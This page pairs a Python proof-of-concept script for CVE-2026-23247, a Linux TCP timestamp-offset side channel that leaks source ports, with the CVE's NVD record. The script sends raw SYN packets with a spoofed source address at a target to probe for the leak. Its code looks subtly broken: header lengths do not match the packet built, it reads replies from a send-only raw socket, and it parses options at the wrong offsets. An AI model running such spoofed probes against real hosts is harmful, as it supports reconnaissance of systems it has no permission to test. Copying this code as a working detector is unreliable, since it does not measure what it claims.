CVE-2026-23247

# CVE-2026-23247 PoC - TCP TS Offset Side-Channel Analysis # This PoC demonstrates port leakage via SYN cookie TS offset import socket import struct import time from collections import defaultdict def craft_syn_packet(src_port, dst_port, target_ip): """Craft a SYN packet for probing""" # IP header ip_ver = 4 ip_ihl = 5 ip_tos = 0 ip_total_length = 40 # 20 IP + 20 TCP ip_id = 0x1234 ip_flags = 0x02 # Don't fragment ip_ttl = 64 ip_protocol = 6 # TCP ip_checksum = 0 ip_src = socket.inet_aton('192.168.1.100') # Spoofed source ip_dst = socket.inet_aton(target_ip) ip_header = struct.pack('!BBHHHBBH', (ip_ver << 4) + ip_ihl, ip_tos, ip_total_length, ip_id, (ip_flags << 13), ip_ttl, ip_protocol, ip_checksum ) + ip_src + ip_dst # TCP header with timestamp option tcp_src = src_port tcp_dst = dst_port tcp_seq = 0 tcp_ack_seq = 0 tcp_data_offset = 10 # 32-bit words tcp_flags = 0x02 # SYN tcp_window = 65535 tcp_checksum = 0 tcp_urgent = 0 # TCP timestamp option: TSval (8 bytes) ts_option = bytes([0x08, 0x0A]) + struct.pack('!II', int(time.time()), 0) tcp_header = struct.pack('!HHLLBBHHH', tcp_src, tcp_dst, tcp_seq, tcp_ack_seq, (tcp_data_offset << 4), tcp_flags, tcp_window, tcp_checksum, tcp_urgent ) + ts_option return ip_header + tcp_header def analyze_ts_offset(sock, target_ip, dst_port, num_probes=100): """Analyze TCP timestamp offsets to detect port leakage""" ts_values = defaultdict(list) for i in range(num_probes): src_port = 10000 + i packet = craft_syn_packet(src_port, dst_port, target_ip) try: sock.sendto(packet, (target_ip, dst_port)) sock.settimeout(0.5) data, addr = sock.recvfrom(1024) # Parse TCP timestamp from response tsval = parse_timestamp_from_response(data) if tsval: ts_values[src_port].append(tsval) except: continue # Analyze correlation between port and TS offset return detect_port_ts_correlation(ts_values) def parse_timestamp_from_response(data): """Extract timestamp value from TCP response""" if len(data) < 60: return None tcp_data = data[20:] # Check for timestamp option (kind=8, len=10) if len(tcp_data) > 12 and tcp_data[12] == 0x08 and tcp_data[13] == 0x0A: return struct.unpack('!I', tcp_data[14:18])[0] return None def detect_port_ts_correlation(ts_data): """Detect if there's correlation between port and TS offset""" # Simple correlation analysis if len(ts_data) < 10: return {"vulnerable": False, "confidence": 0} # Calculate variance in TS offsets for different ports port_diffs = [] ports = sorted(ts_data.keys()) for i in range(len(ports) - 1): p1, p2 = ports[i], ports[i+1] if ts_data[p1] and ts_data[p2]: diff = abs(ts_data[p1][0] - ts_data[p2][0]) port_diffs.append(diff) variance = sum(port_diffs) / len(port_diffs) if port_diffs else 0 # Low variance indicates port is NOT included in TS offset return { "vulnerable": variance < 1000, "confidence": min(100, 100 - variance / 10), "avg_variance": variance } if __name__ == "__main__": target = "192.168.1.1" port = 80 sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) print(f"[*] Analyzing {target} for CVE-2026-23247") result = analyze_ts_offset(sock, target, port) if result["vulnerable"]: print(f"[!] VULNERABLE: Port may not be included in TS offset (confidence: {result['confidence']}%)") else: print(f"[+] NOT VULNERABLE or mitigated") sock.close()

{"cve": {"id": "CVE-2026-23247", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T11:16:16.723", "lastModified": "2026-05-21T17:35:59.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: secure_seq: add back ports to TS offset\n\nThis reverts 28ee1b746f49 (\"secure_seq: downgrade to per-host timestamp offsets\")\n\ntcp_tw_recycle went away in 2017.\n\nZhouyan Deng reported off-path TCP source port leakage via\nSYN cookie side-channel that can be fixed in multiple ways.\n\nOne of them is to bring back TCP ports in TS offset randomization.\n\nAs a bonus, we perform a single siphash() computation\nto provide both an ISN and a TS offset."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ntcp: secure_seq: añadir de nuevo puertos al desplazamiento TS\n\nEsto revierte 28ee1b746f49 ('secure_seq: degradar a desplazamientos de marca de tiempo por host')\n\ntcp_tw_recycle desapareció en 2017.\n\nZhouyan Deng informó de una fuga de puerto de origen TCP fuera de ruta a través de un canal lateral de SYN cookie que se puede solucionar de múltiples maneras.\n\nUna de ellas es traer de vuelta los puertos TCP en la aleatorización del desplazamiento TS.\n\nComo ventaja adicional, realizamos un único cálculo de siphash() para proporcionar tanto un ISN como un desplazamiento TS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartExcluding": "4.11", "versionEndExcluding": "6.18.17", "matchCriteriaId": "93C0B2B1-66EF-41A6-8FCE-4ED37AB02E2A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.10.14:*:*:*:*:*:*:*", "matchCriteriaId": "C30F9041-D8C3-4F81-B9F1-08BA07D0AE00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.11:-:*:*:*:*:*:*", "matchCriteriaId": "623D643F-123E-4D3E-8CBF-16BF845D734B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.11:rc6:*:*:*:*:*:*", "matchCriteriaId": "D67BFFD0-1A52-4F5D-98DB-D94B58FD8D30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.11:rc7:*:*:*:*:*:*", "matchCriteriaId": "7D996F38-22AC-4059-84FC-F7D69CE0CB9B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.11:rc8:*:*:*:*:*:*", "matchCriteriaId": "97EFF4F7-E5F9-4FAA-AD58-94A24501AD59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/165573e41f2f66ef98940cf65f838b2cb575d9d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/46e5b0d7cf55821527adea471ffe52a5afbd9caf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/eae2f14ab2efccdb7480fae7d42c4b0116ef8805", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}